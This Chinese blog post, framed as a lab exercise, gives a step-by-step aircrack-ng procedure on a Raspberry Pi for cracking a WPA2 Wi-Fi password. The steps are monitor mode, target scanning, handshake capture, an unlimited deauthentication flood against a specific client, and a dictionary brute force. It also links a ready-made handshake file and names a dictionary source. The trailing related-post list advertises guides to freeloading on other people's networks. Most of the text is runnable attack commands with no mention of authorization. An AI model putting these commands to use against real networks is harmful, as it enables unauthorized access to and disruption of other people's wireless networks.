实验三:树莓派-暴力破解无线网络密码
树莓派-破解无线网络密码
作者:爱编程的小金毛球球 日期:2021年4月23日
所需设备:树莓派、网线、笔记本、无线网卡、路由器
一、工具说明
aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。
aircrack-ng套件包括:
二、安装
sudo apt-get install aircrack-ng
查看是否安装成功
aircrack-ng
三、查看可用的无线网卡
sudo airmon-ng
四、将无线网卡以监听模式启动
sudo airmon-ng start wlan1
五、扫描周围WiFi
airodump-ng wlan1mon
BSSID:WiFi的MAC地址、PWR:信号强度(结果一般是按强度排序)、Data:监听期间流量综合、CH:WiFi所使用信道、ENC:加密算法、ESSID:WiFi名称
搜寻到自己要破解的wifi后直接按Ctrl+C终止命令即可
98:0D:51:2C:E5:A8 -42 231 1592 0 11 360 WPA2 CCMP
PSK 717
目标是名为717的WiFi,其BSSID为98:0D:51:2C:E5:A8,信道为11
六、开始抓取握手包并保存成文件
(为了方便期间,最好创建专门的文件夹wireless_security)
airodump-ng -c 11 --bssid 98:0D:51:2C:E5:A8 -w /home/pi/wireless_security wlan1mon
#-c指定信道,一定要是上一步查到的要破解的wifi所用信道
#–bssid指定bssid值,一定要是上一步查到的要破解的wifi的bssid
#-w指定捕获的握手到保存到的文件名
从上面动态信息可以看出有1个连接(或者多个),这就可以进行洪水攻击然后拿到握手包,如果刚进去没有看到任何连接,先等待20秒左右,还是没有的话你就得重新选择目标了。在这里说明一下,要想抓到握手包就得进行洪水攻击,攻击的时候连接路由器的手机或者电脑会断开连接然后会自动连接wifi,连接的过程中就有一个数据的传送,而上面的airodump-ng就是要抓取这些数据,拿到需要破解的握手包,即.cap文件。
七、洪水攻击强制对方WiFi断开重连
(保持刚才的窗口,重新开一个窗口进行操作)
sudo aireplay-ng -0 0 -a 98:0D:51:2C:E5:A8 -c 5E:B9:8E:F7:7C:DE wlan1mon
(0为用deauth洪水攻击WiFi设备的次数,0为无限,-0 5则攻击5次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码)
注:为什么要穷举,而不是直接从数据包里面获取密码?因为数据包里面的密码是哈希加密的,哈希加密只能正向,不能反向推导,所以需要一个个正向推导,直到找到正确的密码。
这个时候就注意抓包的窗口,出现WPA handshake :,就表示成功。如果有连接很快就可以抓到包,右上角证明成功抓取到重新认证的98:0D:51:2C:E5:A8的握手包 。成败的关键!!!!!!!!!!
使用Ctrl + C终止抓包命令
此时会在指定的目录产生以下四个文件(每执行一次抓包命令就会产生一组,所以抓包时要注意自己是第几次执行的;不管也行下一步执定文件时使用*号通配符即可)
然后就要进行跑包,就需要密码字典,可以从UCBUG下载。
八、使用字典文件暴力破解密码
sudo aircrack-ng -w DIR.txt ~/wireless_security/*.cap
或者
sudo aircrack-ng -a2 -b 98:0D:51:2C:E5:A8 -w DIR.txt ~/wireless_security/*.cap
#-a2 代表WPA的握手包
#-w指定要使用口令字典文件
#-b指定要目标wifi的mac地址(亦即bssid)
#*.cap是抓取到握手包的数据包文件,*是通配符
如果字典文件中存在WiFi的密码,那就能找到WiFi的密码,如果不包含那就找不到(所以总的来说WiFi成功破解率依赖于字典大小)。
九、关闭网卡监听模式(可选)
在前面步骤中,我们使用airmon-ng将网卡以监听模式启动,最后将网卡还原
airmon-ng stop wlan1mon
注:
如果你不幸,在关键部分失败,那也没有关系,这里有已经
抓取到的握手包,你只需要导入,尝试一下后续步骤即可(内含假的密码字典一个0.0),记得点赞啊亲~~~~
链接:https://pan.baidu.com/s/1Kl8gIaIZc8Oz88pwHkzprA 提取码:3joo
实验三:树莓派-暴力破解无线网络密码相关推荐
- 用BT3破解无线网络密码的教程以及如何制作U盘版和光盘版BT3
用BT3破解无线网络密码的教程以及如何制作U盘版BT3 招:论坛版主 新建 文本文档.rar (1 K) 下载次数:81 一分钟制作 BT3 U盘版 方便,快捷简单 光盘版BT3, 大概694MB, ...
- 手把手教你如何破解无线网络密码(蹭网教程) .
本文只做技术交流之用,提醒各位注意无线网络安全性,请勿用于其他用途,否则后果自负. 前言:面对电脑搜索到的无线网络信号,你是否怦然心动?但看到一个个"启用安全的无线网络"你是否又感 ...
- 2012破解无线网络密码教程
本无线网络密码破解傻瓜图文教程只做技术交流之用,提醒各位注意无线网络安全性,请勿用于其他用途,否则后果自负. 面对电脑搜索到的无线网络信号,你是否怦然心动?但看到一个个"启用安全的无线网络& ...
- 如何轻松破解无线网络密码
奶瓶这个系统,相信玩无线的朋友应该都会知道.这是一款基于 Tiny Core Linux 搭建的无线网络安全测试系统,当然由于它是用来安全测试的系统,因此在安全方面自然有着强大的功能.而且,这个系统非 ...
- 破解无线网络密码-BT3如何使用1
一分钟制作 BT3 U盘版 方便,快捷简单 光盘版BT3, 大概694MB,直接刻盘,然后用光盘引导,即可进入bt3,连接为: http://ftp.heanet.ie/mirrors/backtra ...
- 破解无线网络密码教程
http://itbbs.pconline.com.cn/notebook/10496706.html
- python爬虫教程:爬取破解无线网络wifi密码过程解析
这篇文章主要介绍了Python爬取破解无线网络密码过程解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 前言 今天从WiFi连接的原理,再结合代码 ...
- 从零开始,教你如何破解WEP、WPA无线网络 密码
近些年无线技术发展迅速,越来越多的用户开始使用无线网络,最近新搬到一小区没有安装网络,后面想到以前出差时在机场用过无线网络,小区内是否也有无线网络呢?随便一搜,果然有几个无线网络信号,于是打起了免费蹭 ...
- 用Interl 5100AGN 无线网卡破解无线网络WEP密码
在这里我使用两种方法破解无线网络WEP密码:工具破解和命令行破解. 1.使用霸天虎Mini-BT3.6.1 下载霸天虎Mini-BT 3.6.1.ISO, 解压后,将boot.slax文件 ...
- 无线网络密码破解傻瓜图文教程
本无线网络密码破解傻瓜图文教程只做技术交流之用,提醒各位注意无线网络安全性,请勿用于其他用途,否则后果自负. 前言:面对电脑搜索到的无线网络信号,你是否怦然心动?但看到一个个启用安全的无线网络你 ...
最新文章
- java web学习项目20套源码完整版
- React学习笔记二——react-router
- 余承东:华为 P50 系列无 5G 版本,但依然流畅
- 唱吧DevOps的落地,微服务CI/CD的范本技术解读----最大的难点并不是实际业务代码的编写,而是服务的监控和调试以及容器的编排...
- linux 下ssh端口反弹,利用ssh隧道反弹shell
- 一篇好的技术博文,快速让你通俗理解Python闭包!
- web-midi-api
- linux上python3的安装
- 前端学习笔记系列一:2 Vue的单文件组件
- linux终端下载vscode,Ubuntu:安装vscode
- ZOJ 3432 Find the Lost Sock (水题)
- 网络管理员掌握的学习方法
- Base64编码原理
- list保存到scv
- export default (imported as router) was not found_一篇文章搞定as四大用法
- 计算机视觉 || 手写字体检测
- Java学习第二十四天
- 详解Shell脚本:正则表达式
- 零膨胀回归模型简介及其R语言实现
- 没有iphone上架appstore怎么截屏